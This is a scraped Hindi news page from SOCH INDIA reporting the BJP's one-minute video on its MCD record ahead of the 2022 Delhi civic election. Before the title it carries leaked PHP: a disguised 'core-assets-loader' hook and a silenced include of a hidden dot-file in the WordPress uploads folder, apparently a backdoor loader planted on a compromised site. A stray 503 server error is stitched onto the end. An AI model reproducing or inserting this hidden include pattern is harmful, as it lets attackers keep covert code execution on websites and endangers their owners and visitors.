add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); MCD में BJP के राज में क्या-क्या हुआ? पार्टी ने 1 मिनट का वीडियो जारी कर गिनाएं काम – SOCH INDIA
Menu

देश
MCD में BJP के राज में क्या-क्या हुआ? पार्टी ने 1 मिनट का वीडियो जारी कर गिनाएं काम

nobanner

 दिल्ली में एमसीडी चुनाव 2022 (MCD Election 2022) के लिए सभी राजनीतिक दल जोर-शोर से प्रचार में लगे हुए हैं. पिछले 15 साल से बीजेपी (BJP) एमसीडी (MCD) पर काबिज है. बीजेपी एमसीडी चुनाव में एक बार फिर से जीत का दावा कर रही है. आज (शुक्रवार को) बीजेपी ने 1 मिनट का एक वीडियो जारी करके एमसीडी में अपने काम का हिसाब दिया है. दिल्ली बीजेपी के आधिकारिक ट्विटर हैंडल से एमसीडी के काम के हिसाब का ये वीडियो जारी किया गया है.

MCD के विकास कार्य

दिल्ली बीजेपी ने ट्विटर पर वीडियो पोस्ट किया और उसके कैप्शन में लिखा, ‘भाजपा शासन में MCD ने किए काम बेमिसाल, अगले 1 मिनट में देखिए MCD के विकास कार्य.’

3,024 गरीबों को मिले पक्के मकान

एमसीडी चुनाव 2022 के प्रचार-प्रसार के दौरान बीजेपी ने अपने काम का हिसाब दिया. बीजेपी के मुताबिक, पीएम मोदी की जहां झुग्गी वहां मकान की योजना के तहत गरीबों को 3,024 पक्के मकान दिए गए. इसके अलावा, बिना शोर MCD के स्कूल स्टूडेंट्स को वर्ल्ड क्लास स्तर की शिक्षा देने पर जोर दे रहे हैं.

बड़े पैमाने पर वृक्षारोपण शुरू

बीजेपी के अनुसार, आप ने दिल्ली को गैस चैंबर बनाया. प्रदूषण पर ध्यान नहीं दिया. लेकिन बीजेपी शासित एमसीडी की तरफ से व्यापक स्तर पर दिल्ली में वृक्षारोपण शुरू किया गया. दिल्ली में 85 हजार पेड़ और 5 लाख झाड़ियां लगाने का काम शुरू किया गया.

इसके अलावा वेस्ट मैटेरियल से भारत दर्शन पार्क बनाया गया. ऑपरेशन क्लीन दिल्ली के तहत दिल्ली के कोने-कोने की सफाई हो रही है. बीजेपी का कहना है कि एमसीडी बिना शोर किए, बिना प्रचार-प्रसार के सेवा कर रही है, क्योंकि बीजेपी के लिए सेवा विचार है. खोखला प्रचार नहीं करते हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.